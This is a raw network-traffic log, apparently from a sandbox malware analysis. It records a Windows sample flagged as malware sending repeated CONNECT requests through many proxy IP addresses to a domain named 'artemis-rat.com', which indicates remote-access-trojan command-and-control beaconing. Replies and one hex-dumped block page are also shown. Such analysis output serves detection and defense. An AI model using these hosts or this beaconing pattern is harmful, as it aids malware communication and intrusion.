                                              Mar 11, 2024 08:37:25.056885004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.164469957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.366729975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:37.366620064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:49.366606951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:01.366182089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:13.383019924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:37.507014990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:39:25.506879091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1679192.168.2.450685162.214.225.223634527284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.056940079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.164228916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.366744041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1680192.168.2.450639147.124.212.31132767284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.066190958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.164235115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.366738081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:37.366592884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:49.366586924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:13.381953001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:39:01.397479057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1681192.168.2.45510561.178.152.3173027284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.076749086 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:25.440459967 CET90INHTTP/1.1 200 OK
                                              Content-Type: application/json
                                              Connection: close
                                              Content-Length: 55


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1682192.168.2.455107103.83.232.122807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.169606924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1683192.168.2.450750150.136.4.25031287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.173060894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.409327984 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1684192.168.2.455170120.76.42.20988887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.173136950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.507570028 CET767INHTTP/1.1 403 Forbidden
                                              Server: Beaver
                                              Cache-Control: no-cache
                                              Content-Type: text/html
                                              Content-Length: 635
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                              Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1685192.168.2.455180167.235.185.4769697284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.173846006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.866503954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.843791008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:33.724730015 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1686192.168.2.45064992.204.134.38597277284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.174377918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.757141113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.366556883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.569757938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1687192.168.2.45510294.177.106.17823247284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.174443007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1688192.168.2.454542114.129.2.8280817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.174443960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.439197063 CET72INHTTP/1.1 200 Connection established
                                              Proxy-Agent: Fortinet-Proxy/1.0
                                              Mar 11, 2024 08:37:26.254579067 CET72INHTTP/1.1 200 Connection established
                                              Proxy-Agent: Fortinet-Proxy/1.0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1689192.168.2.45518260.188.102.225180807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.174920082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1690192.168.2.4551875.252.23.22010807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.175681114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.866477013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.868453979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.866594076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.569649935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:36.257285118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:40.053828955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:47.553739071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:02.369445086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1691192.168.2.45519638.54.101.25490007284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.176332951 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:27.355562925 CET39INHTTP/1.1 200 Connection established
                                              Mar 11, 2024 08:37:28.429639101 CET39INHTTP/1.1 200 Connection established
                                              Mar 11, 2024 08:37:29.485352993 CET39INHTTP/1.1 200 Connection established
                                              Mar 11, 2024 08:37:31.661951065 CET39INHTTP/1.1 200 Connection established
                                              Mar 11, 2024 08:37:36.013683081 CET39INHTTP/1.1 200 Connection established
                                              Mar 11, 2024 08:37:44.461844921 CET39INHTTP/1.1 200 Connection established
                                              Mar 11, 2024 08:38:02.381491899 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1692192.168.2.455168114.79.148.218807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.176420927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.019865036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.246889114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.574650049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1693192.168.2.450611162.241.46.6615797284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.182755947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.366501093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.460294008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:37.509365082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:49.553705931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:01.553724051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:13.631845951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:37.631880045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:39:25.631882906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1694192.168.2.450673189.173.223.2259997284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:25.185502052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.366499901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.460309029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:37.509505987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:49.553821087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:52.018729925 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
